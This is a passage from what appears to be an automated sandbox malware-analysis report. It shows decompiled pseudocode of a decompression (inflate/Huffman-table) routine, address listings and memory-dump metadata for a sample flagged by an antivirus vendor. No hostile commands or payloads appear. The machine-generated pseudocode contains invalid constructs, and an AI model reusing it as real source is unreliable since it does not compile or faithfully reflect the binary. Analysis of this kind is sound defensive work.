                                                                            													__eflags = __edx - __ecx;
                                                                            													if(__eflags != 0) {
                                                                            														 *(__ebp - 0x30) = __edx;
                                                                            														if(__eflags >= 0) {
                                                                            															__edi = __edi - __edx;
                                                                            															__eflags = __edi;
                                                                            															__eax = __edi;
                                                                            														} else {
                                                                            															__ecx = __ecx - __edx;
                                                                            															__eax = __ecx;
                                                                            														}
                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                            													}
                                                                            												}
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													goto L184;
                                                                            												} else {
                                                                            													goto L48;
                                                                            												}
                                                                            											}
                                                                            											L33:
                                                                            											__eax = __esi[0x26e9];
                                                                            											__edi =  &(__esi[0x6e8]);
                                                                            											__eflags = __eax - __edi;
                                                                            											if(__eax == __edi) {
                                                                            												goto L38;
                                                                            											}
                                                                            											L34:
                                                                            											__edx = __edi;
                                                                            											__eflags = __edx - __eax;
                                                                            											 *(__ebp - 0x30) = __edx;
                                                                            											if(__edx >= __eax) {
                                                                            												__ecx = __ecx - __edx;
                                                                            												__eflags = __ecx;
                                                                            												__eax = __ecx;
                                                                            											} else {
                                                                            												__eax = __eax - __edx;
                                                                            												__eax = __eax - 1;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L48;
                                                                            											} else {
                                                                            												goto L38;
                                                                            											}
                                                                            										case 0xb:
                                                                            											goto L56;
                                                                            										case 0xc:
                                                                            											L60:
                                                                            											__esi[1] = __esi[1] >> 0xa;
                                                                            											__eax = (__esi[1] >> 0xa) + 4;
                                                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                            												goto L68;
                                                                            											}
                                                                            											goto L61;
                                                                            										case 0xd:
                                                                            											while(1) {
                                                                            												L93:
                                                                            												__eax = __esi[1];
                                                                            												__ecx = __esi[2];
                                                                            												__edx = __eax;
                                                                            												__eax = __eax & 0x0000001f;
                                                                            												__edx = __edx >> 5;
                                                                            												__eax = __edx + __eax + 0x102;
                                                                            												__eflags = __esi[2] - __eax;
                                                                            												if(__esi[2] >= __eax) {
                                                                            													break;
                                                                            												}
                                                                            												L73:
                                                                            												__eax = __esi[0x143];
                                                                            												while(1) {
                                                                            													L76:
                                                                            													__eflags = __ebx - __eax;
                                                                            													if(__ebx >= __eax) {
                                                                            														break;
                                                                            													}
                                                                            													L74:
                                                                            													__eflags =  *(__ebp - 0x34);
                                                                            													if( *(__ebp - 0x34) == 0) {
                                                                            														goto L183;
                                                                            													}
                                                                            													L75:
                                                                            													__ecx =  *(__ebp - 0x38);
                                                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            													__ecx = __ebx;
                                                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            													__ebx = __ebx + 8;
                                                                            													__eflags = __ebx;
                                                                            												}
                                                                            												L77:
                                                                            												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                                            												__eax = __eax &  *(__ebp - 0x40);
                                                                            												__ecx = __esi[0x144];
                                                                            												__eax = __esi[0x144] + __eax * 4;
                                                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                            												__eflags = __eax - 0x10;
                                                                            												 *(__ebp - 0x14) = __eax;
                                                                            												if(__eax >= 0x10) {
                                                                            													L79:
                                                                            													__eflags = __eax - 0x12;
                                                                            													if(__eax != 0x12) {
                                                                            														__eax = __eax + 0xfffffff2;
                                                                            														 *(__ebp - 8) = 3;
                                                                            													} else {
                                                                            														_push(7);
                                                                            														 *(__ebp - 8) = 0xb;
                                                                            														_pop(__eax);
                                                                            													}
                                                                            													while(1) {
                                                                            														L84:
                                                                            														__ecx = __eax + __edx;
                                                                            														__eflags = __ebx - __eax + __edx;
                                                                            														if(__ebx >= __eax + __edx) {
                                                                            															break;
                                                                            														}
                                                                            														L82:
                                                                            														__eflags =  *(__ebp - 0x34);
                                                                            														if( *(__ebp - 0x34) == 0) {
                                                                            															goto L183;
                                                                            														}
                                                                            														L83:
                                                                            														__ecx =  *(__ebp - 0x38);
                                                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                            														__ecx = __ebx;
                                                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                            														__ebx = __ebx + 8;
                                                                            														__eflags = __ebx;
                                                                            													}
                                                                            													L85:
                                                                            													__ecx = __edx;
                                                                            													__ebx = __ebx - __edx;
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                            													__edx =  *(__ebp - 8);
                                                                            													__ebx = __ebx - __eax;
                                                                            													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                            													__ecx = __eax;
                                                                            													__eax = __esi[1];
                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            													__ecx = __esi[2];
                                                                            													__eax = __eax >> 5;
                                                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                            													__eax = __eax & 0x0000001f;
                                                                            													__eax = __edi + __eax + 0x102;
                                                                            													__edi = __edx + __ecx;
                                                                            													__eflags = __edx + __ecx - __eax;
                                                                            													if(__edx + __ecx > __eax) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L86:
                                                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                            													if( *(__ebp - 0x14) != 0x10) {
                                                                            														L89:
                                                                            														__edi = 0;
                                                                            														__eflags = 0;
                                                                            														L90:
                                                                            														__eax = __esi + 0xc + __ecx * 4;
                                                                            														do {
                                                                            															L91:
                                                                            															 *__eax = __edi;
                                                                            															__ecx = __ecx + 1;
                                                                            															__eax = __eax + 4;
                                                                            															__edx = __edx - 1;
                                                                            															__eflags = __edx;
                                                                            														} while (__edx != 0);
                                                                            														__esi[2] = __ecx;
                                                                            														continue;
                                                                            													}
                                                                            													L87:
                                                                            													__eflags = __ecx - 1;
                                                                            													if(__ecx < 1) {
                                                                            														goto L9;
                                                                            													}
                                                                            													L88:
                                                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                                                            													goto L90;
                                                                            												}
                                                                            												L78:
                                                                            												__ecx = __edx;
                                                                            												__ebx = __ebx - __edx;
                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                            												__ecx = __esi[2];
                                                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                            												__esi[2] = __esi[2] + 1;
                                                                            											}
                                                                            											L94:
                                                                            											__eax = __esi[1];
                                                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                            											__edi = __eax;
                                                                            											__eax = __eax >> 5;
                                                                            											__edi = __edi & 0x0000001f;
                                                                            											__ecx = 0x101;
                                                                            											__eax = __eax & 0x0000001f;
                                                                            											__edi = __edi + 0x101;
                                                                            											__eax = __eax + 1;
                                                                            											__edx = __ebp - 0xc;
                                                                            											 *(__ebp - 0x14) = __eax;
                                                                            											 &(__esi[0x148]) = __ebp - 4;
                                                                            											 *(__ebp - 4) = 9;
                                                                            											__ebp - 0x18 =  &(__esi[3]);
                                                                            											 *(__ebp - 0x10) = 6;
                                                                            											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                            											__eflags =  *(__ebp - 4);
                                                                            											if( *(__ebp - 4) == 0) {
                                                                            												__eax = __eax | 0xffffffff;
                                                                            												__eflags = __eax;
                                                                            											}
                                                                            											__eflags = __eax;
                                                                            											if(__eax != 0) {
                                                                            												goto L9;
                                                                            											} else {
                                                                            												L97:
                                                                            												__ebp - 0xc =  &(__esi[0x148]);
                                                                            												__ebp - 0x10 = __ebp - 0x1c;
                                                                            												__eax = __esi + 0xc + __edi * 4;
                                                                            												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                            												__eflags = __eax;
                                                                            												if(__eax != 0) {
                                                                            													goto L9;
                                                                            												}
                                                                            												L98:
                                                                            												__eax =  *(__ebp - 0x10);
                                                                            												__eflags =  *(__ebp - 0x10);
                                                                            												if( *(__ebp - 0x10) != 0) {
                                                                            													L100:
                                                                            													__cl =  *(__ebp - 4);
                                                                            													 *__esi =  *__esi & 0x00000000;
                                                                            													__eflags =  *__esi;
                                                                            													__esi[4] = __al;
                                                                            													__eax =  *(__ebp - 0x18);
                                                                            													__esi[5] =  *(__ebp - 0x18);
                                                                            													__eax =  *(__ebp - 0x1c);
                                                                            													__esi[4] = __cl;
                                                                            													__esi[6] =  *(__ebp - 0x1c);
                                                                            													goto L101;
                                                                            												}
                                                                            												L99:
                                                                            												__eflags = __edi - 0x101;
                                                                            												if(__edi > 0x101) {
                                                                            													goto L9;
                                                                            												}
                                                                            												goto L100;
                                                                            											}
                                                                            										case 0xe:
                                                                            											goto L9;
                                                                            										case 0xf:
                                                                            											L176:
                                                                            											__eax =  *(__ebp - 0x30);
                                                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                            											__eax = L004074F4( *((intOrPtr*)(__ebp + 8)));
                                                                            											__ecx = __esi[0x26ea];
                                                                            											__edx = __esi[0x26e9];
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x30) = __ecx;
                                                                            											if(__ecx >= __edx) {
                                                                            												__eax = __esi[0x26e8];
                                                                            												__eax = __esi[0x26e8] - __ecx;
                                                                            												__eflags = __eax;
                                                                            											} else {
                                                                            												__edx = __edx - __ecx;
                                                                            												__eax = __edx - __ecx - 1;
                                                                            											}
                                                                            											__eflags = __ecx - __edx;
                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                            											if(__ecx != __edx) {
                                                                            												L184:
                                                                            												__edi = 0;
                                                                            												goto L10;
                                                                            											} else {
                                                                            												L180:
                                                                            												__eax = __esi[0x145];
                                                                            												__eflags = __eax - 8;
                                                                            												 *__esi = __eax;
                                                                            												if(__eax != 8) {
                                                                            													L185:
                                                                            													0 = 1;
                                                                            													goto L10;
                                                                            												}
                                                                            												goto L181;
                                                                            											}
                                                                            									}
                                                                            								}
                                                                            								L182:
                                                                            								goto L9;
                                                                            							}
                                                                            							L70:
                                                                            							if( *__edi == __eax) {
                                                                            								goto L72;
                                                                            							}
                                                                            							L71:
                                                                            							__esi[2] = __esi[2] & __eax;
                                                                            							 *__esi = 0xd;
                                                                            							goto L93;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L183:
                                                                            				_t443 = 0;
                                                                            				_t446[0x147] =  *(_t448 - 0x40);
                                                                            				_t446[0x146] = _t425;
                                                                            				( *(_t448 + 8))[1] = 0;
                                                                            				goto L11;
                                                                            			}









                                                                            0x0040724b
                                                                            0x0040724b
                                                                            0x00407252
                                                                            0x0040725a
                                                                            0x0040725d
                                                                            0x00407260
                                                                            0x00407262
                                                                            0x00407265
                                                                            0x00407265
                                                                            0x00407267
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040726d
                                                                            0x0040726d
                                                                            0x00407270
                                                                            0x00407275
                                                                            0x00407277
                                                                            0x0040727d
                                                                            0x0040727f
                                                                            0x00407294
                                                                            0x00407296
                                                                            0x00407296
                                                                            0x00407281
                                                                            0x00407287
                                                                            0x00407289
                                                                            0x0040728b
                                                                            0x0040728b
                                                                            0x00407298
                                                                            0x0040729c
                                                                            0x0040729f
                                                                            0x004072a5
                                                                            0x004072a5
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072a8
                                                                            0x004072aa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072b0
                                                                            0x004072b0
                                                                            0x004072b6
                                                                            0x004072b8
                                                                            0x004072dd
                                                                            0x004072e0
                                                                            0x004072e6
                                                                            0x004072eb
                                                                            0x004072f1
                                                                            0x004072f7
                                                                            0x004072f9
                                                                            0x004072fc
                                                                            0x00407305
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x004072fe
                                                                            0x00407300
                                                                            0x00407302
                                                                            0x00407302
                                                                            0x0040730d
                                                                            0x00407313
                                                                            0x00407315
                                                                            0x00407318
                                                                            0x0040731a
                                                                            0x00407320
                                                                            0x00407322
                                                                            0x00407324
                                                                            0x00407326
                                                                            0x00407328
                                                                            0x0040732b
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407337
                                                                            0x0040732d
                                                                            0x0040732d
                                                                            0x00407330
                                                                            0x00407330
                                                                            0x0040732b
                                                                            0x00407322
                                                                            0x00407339
                                                                            0x0040733b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040733b
                                                                            0x004072ba
                                                                            0x004072ba
                                                                            0x004072c0
                                                                            0x004072c6
                                                                            0x004072c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004072ca
                                                                            0x004072ca
                                                                            0x004072cc
                                                                            0x004072ce
                                                                            0x004072d7
                                                                            0x004072d7
                                                                            0x004072d0
                                                                            0x004072d0
                                                                            0x004072d3
                                                                            0x004072d3
                                                                            0x004072d9
                                                                            0x004072db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407341
                                                                            0x00407341
                                                                            0x00407346
                                                                            0x00407348
                                                                            0x00407349
                                                                            0x0040734a
                                                                            0x0040734b
                                                                            0x00407351
                                                                            0x00407354
                                                                            0x00407357
                                                                            0x0040735a
                                                                            0x0040735c
                                                                            0x00407362
                                                                            0x00407362
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x00407365
                                                                            0x0040736e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407373
                                                                            0x00407373
                                                                            0x00407376
                                                                            0x00407379
                                                                            0x0040737b
                                                                            0x00407412
                                                                            0x00407412
                                                                            0x00407415
                                                                            0x00407417
                                                                            0x00407418
                                                                            0x00407419
                                                                            0x0040741c
                                                                            0x00000000
                                                                            0x0040741c
                                                                            0x00407381
                                                                            0x00407381
                                                                            0x00407387
                                                                            0x00407389
                                                                            0x004073ae
                                                                            0x004073b1
                                                                            0x004073b7
                                                                            0x004073bc
                                                                            0x004073c2
                                                                            0x004073c8
                                                                            0x004073ca
                                                                            0x004073cd
                                                                            0x004073d6
                                                                            0x004073dc
                                                                            0x004073dc
                                                                            0x004073cf
                                                                            0x004073d1
                                                                            0x004073d3
                                                                            0x004073d3
                                                                            0x004073de
                                                                            0x004073e4
                                                                            0x004073e6
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073f1
                                                                            0x004073f3
                                                                            0x004073f5
                                                                            0x004073f7
                                                                            0x004073f9
                                                                            0x004073fc
                                                                            0x00407405
                                                                            0x00407408
                                                                            0x00407408
                                                                            0x004073fe
                                                                            0x004073fe
                                                                            0x00407401
                                                                            0x00407401
                                                                            0x004073fc
                                                                            0x004073f3
                                                                            0x0040740a
                                                                            0x0040740c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040740c
                                                                            0x0040738b
                                                                            0x0040738b
                                                                            0x00407391
                                                                            0x00407397
                                                                            0x00407399
                                                                            0x0040739a
                                                                            0x00000000
                                                                            0x00407424
                                                                            0x00407424
                                                                            0x00407427
                                                                            0x00407429
                                                                            0x0040742c
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x0040742f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406add
                                                                            0x00406ac1
                                                                            0x00000000
                                                                            0x00406ac7
                                                                            0x00406aca
                                                                            0x00406ad4
                                                                            0x00406ad7
                                                                            0x00406ada
                                                                            0x00000000
                                                                            0x00406ada
                                                                            0x00406ac1
                                                                            0x00406ae5
                                                                            0x00406ae8
                                                                            0x00406aec
                                                                            0x00406af6
                                                                            0x00406b00
                                                                            0x00406b03
                                                                            0x00406b09
                                                                            0x00406c3d
                                                                            0x00406c3f
                                                                            0x00406c45
                                                                            0x00406c48
                                                                            0x00406c4b
                                                                            0x00000000
                                                                            0x00406c4b
                                                                            0x00406b0f
                                                                            0x00406b0f
                                                                            0x00406b10
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6f
                                                                            0x00406c15
                                                                            0x00406c15
                                                                            0x00406c1a
                                                                            0x00406c1d
                                                                            0x00406c22
                                                                            0x00406c25
                                                                            0x00406c2a
                                                                            0x00406c2d
                                                                            0x00406c32
                                                                            0x00406c35
                                                                            0x00406c35
                                                                            0x00000000
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b75
                                                                            0x00406b79
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b7e
                                                                            0x00406b83
                                                                            0x00406b85
                                                                            0x00406b87
                                                                            0x00406b8c
                                                                            0x00406b92
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8e
                                                                            0x00406b8c
                                                                            0x00406b9b
                                                                            0x00406b9e
                                                                            0x00406ba0
                                                                            0x00406ba3
                                                                            0x00406ba3
                                                                            0x00406bd7
                                                                            0x00406bdc
                                                                            0x00406bde
                                                                            0x00406bdf
                                                                            0x00406be1
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406be2
                                                                            0x00406c0a
                                                                            0x00406c0f
                                                                            0x00406c0f
                                                                            0x00000000
                                                                            0x00406c0f
                                                                            0x00406b6f
                                                                            0x00406b12
                                                                            0x00406b12
                                                                            0x00406b13
                                                                            0x00406b5d
                                                                            0x00000000
                                                                            0x00406b5d
                                                                            0x00406b15
                                                                            0x00406b16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c72
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c52
                                                                            0x00406c52
                                                                            0x00406c56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c5c
                                                                            0x00406c5c
                                                                            0x00406c5f
                                                                            0x00406c62
                                                                            0x00406c67
                                                                            0x00406c69
                                                                            0x00406c6c
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c6f
                                                                            0x00406c77
                                                                            0x00406c77

                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                            				signed int _v8;
                                                                            				unsigned int _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				intOrPtr* _v32;
                                                                            				signed int* _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				intOrPtr _v48;
                                                                            				intOrPtr _v52;
                                                                            				void _v116;
                                                                            				signed int _v176;
                                                                            				signed int _v180;
                                                                            				signed int _v240;
                                                                            				signed int _t166;
                                                                            				signed int _t168;
                                                                            				intOrPtr _t175;
                                                                            				signed int _t181;
                                                                            				void* _t182;
                                                                            				intOrPtr _t183;
                                                                            				signed int* _t184;
                                                                            				signed int _t186;
                                                                            				signed int _t187;
                                                                            				signed int* _t189;
                                                                            				signed int _t190;
                                                                            				intOrPtr* _t191;
                                                                            				intOrPtr _t192;
                                                                            				signed int _t193;
                                                                            				signed int _t195;
                                                                            				signed int _t200;
                                                                            				signed int _t205;
                                                                            				void* _t207;
                                                                            				short _t208;
                                                                            				signed char _t222;
                                                                            				signed int _t224;
                                                                            				signed int _t225;
                                                                            				signed int* _t232;
                                                                            				signed int _t233;
                                                                            				signed int _t234;
                                                                            				void* _t235;
                                                                            				signed int _t236;
                                                                            				signed int _t244;
                                                                            				signed int _t246;
                                                                            				signed int _t251;
                                                                            				signed int _t254;
                                                                            				signed int _t256;
                                                                            				signed int _t259;
                                                                            				signed int _t262;
                                                                            				void* _t263;
                                                                            				void* _t264;
                                                                            				signed int _t267;
                                                                            				intOrPtr _t269;
                                                                            				intOrPtr _t271;
                                                                            				signed int _t274;
                                                                            				intOrPtr* _t275;
                                                                            				unsigned int _t276;
                                                                            				void* _t277;
                                                                            				signed int _t278;
                                                                            				intOrPtr* _t279;
                                                                            				signed int _t281;
                                                                            				intOrPtr _t282;
                                                                            				intOrPtr _t283;
                                                                            				signed int* _t284;
                                                                            				signed int _t286;
                                                                            				signed int _t287;
                                                                            				signed int _t288;
                                                                            				signed int _t296;
                                                                            				signed int* _t297;
                                                                            				intOrPtr _t298;
                                                                            				void* _t299;
                                                                            
                                                                            				_t278 = _a8;
                                                                            				_t187 = 0x10;
                                                                            				memset( &_v116, 0, _t187 << 2);
                                                                            				_t189 = _a4;
                                                                            				_t233 = _t278;
                                                                            				do {
                                                                            					_t166 =  *_t189;
                                                                            					_t189 =  &(_t189[1]);
                                                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                            					_t233 = _t233 - 1;
                                                                            				} while (_t233 != 0);
                                                                            				if(_v116 != _t278) {
                                                                            					_t279 = _a28;
                                                                            					_t267 =  *_t279;
                                                                            					_t190 = 1;
                                                                            					_a28 = _t267;
                                                                            					_t234 = 0xf;
                                                                            					while(1) {
                                                                            						_t168 = 0;
                                                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						if(_t190 <= _t234) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v8 = _t190;
                                                                            					if(_t267 < _t190) {
                                                                            						_a28 = _t190;
                                                                            					}
                                                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                            						_t234 = _t234 - 1;
                                                                            						if(_t234 != 0) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v28 = _t234;
                                                                            					if(_a28 > _t234) {
                                                                            						_a28 = _t234;
                                                                            					}
                                                                            					 *_t279 = _a28;
                                                                            					_t181 = 1 << _t190;
                                                                            					while(_t190 < _t234) {
                                                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                            						if(_t182 < 0) {
                                                                            							L64:
                                                                            							return _t168 | 0xffffffff;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						_t181 = _t182 + _t182;
                                                                            					}
                                                                            					_t281 = _t234 << 2;
                                                                            					_t191 = _t299 + _t281 - 0x70;
                                                                            					_t269 =  *_t191;
                                                                            					_t183 = _t181 - _t269;
                                                                            					_v52 = _t183;
                                                                            					if(_t183 < 0) {
                                                                            						goto L64;
                                                                            					}
                                                                            					_v176 = _t168;
                                                                            					 *_t191 = _t269 + _t183;
                                                                            					_t192 = 0;
                                                                            					_t235 = _t234 - 1;
                                                                            					if(_t235 == 0) {
                                                                            						L21:
                                                                            						_t184 = _a4;
                                                                            						_t271 = 0;
                                                                            						do {
                                                                            							_t193 =  *_t184;
                                                                            							_t184 =  &(_t184[1]);
                                                                            							if(_t193 != _t168) {
                                                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                            								_t236 =  *_t232;
                                                                            								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                            								 *_t232 = _t236 + 1;
                                                                            							}
                                                                            							_t271 = _t271 + 1;
                                                                            						} while (_t271 < _a8);
                                                                            						_v16 = _v16 | 0xffffffff;
                                                                            						_v40 = _v40 & 0x00000000;
                                                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                            						_t195 = _v8;
                                                                            						_t186 =  ~_a28;
                                                                            						_v12 = _t168;
                                                                            						_v180 = _t168;
                                                                            						_v36 = 0x432190;
                                                                            						_v240 = _t168;
                                                                            						if(_t195 > _v28) {
                                                                            							L62:
                                                                            							_t168 = 0;
                                                                            							if(_v52 == 0 || _v28 == 1) {
                                                                            								return _t168;
                                                                            							} else {
                                                                            								goto L64;
                                                                            							}
                                                                            						}
                                                                            						_v44 = _t195 - 1;
                                                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                            						do {
                                                                            							_t282 =  *_v32;
                                                                            							if(_t282 == 0) {
                                                                            								goto L61;
                                                                            							}
                                                                            							while(1) {
                                                                            								_t283 = _t282 - 1;
                                                                            								_t200 = _a28 + _t186;
                                                                            								_v48 = _t283;
                                                                            								_v24 = _t200;
                                                                            								if(_v8 <= _t200) {
                                                                            									goto L45;
                                                                            								}
                                                                            								L31:
                                                                            								_v20 = _t283 + 1;
                                                                            								do {
                                                                            									_v16 = _v16 + 1;
                                                                            									_t296 = _v28 - _v24;
                                                                            									if(_t296 > _a28) {
                                                                            										_t296 = _a28;
                                                                            									}
                                                                            									_t222 = _v8 - _v24;
                                                                            									_t254 = 1 << _t222;
                                                                            									if(1 <= _v20) {
                                                                            										L40:
                                                                            										_t256 =  *_a36;
                                                                            										_t168 = 1 << _t222;
                                                                            										_v40 = 1;
                                                                            										_t274 = _t256 + 1;
                                                                            										if(_t274 > 0x5a0) {
                                                                            											goto L64;
                                                                            										}
                                                                            									} else {
                                                                            										_t275 = _v32;
                                                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                            										if(_t222 >= _t296) {
                                                                            											goto L40;
                                                                            										}
                                                                            										while(1) {
                                                                            											_t222 = _t222 + 1;
                                                                            											if(_t222 >= _t296) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t275 = _t275 + 4;
                                                                            											_t264 = _t263 + _t263;
                                                                            											_t175 =  *_t275;
                                                                            											if(_t264 <= _t175) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t263 = _t264 - _t175;
                                                                            										}
                                                                            										goto L40;
                                                                            									}
                                                                            									_t168 = _a32 + _t256 * 4;
                                                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                            									 *_a36 = _t274;
                                                                            									_t259 = _v16;
                                                                            									 *_t297 = _t168;
                                                                            									if(_t259 == 0) {
                                                                            										 *_a24 = _t168;
                                                                            									} else {
                                                                            										_t276 = _v12;
                                                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                            										_a5 = _a28;
                                                                            										_a4 = _t222;
                                                                            										_t262 = _t276 >> _t186;
                                                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                            										 *(_t298 + _t262 * 4) = _a4;
                                                                            									}
                                                                            									_t224 = _v24;
                                                                            									_t186 = _t224;
                                                                            									_t225 = _t224 + _a28;
                                                                            									_v24 = _t225;
                                                                            								} while (_v8 > _t225);
                                                                            								L45:
                                                                            								_t284 = _v36;
                                                                            								_a5 = _v8 - _t186;
                                                                            								if(_t284 < 0x432190 + _a8 * 4) {
                                                                            									_t205 =  *_t284;
                                                                            									if(_t205 >= _a12) {
                                                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                            										_v36 =  &(_v36[1]);
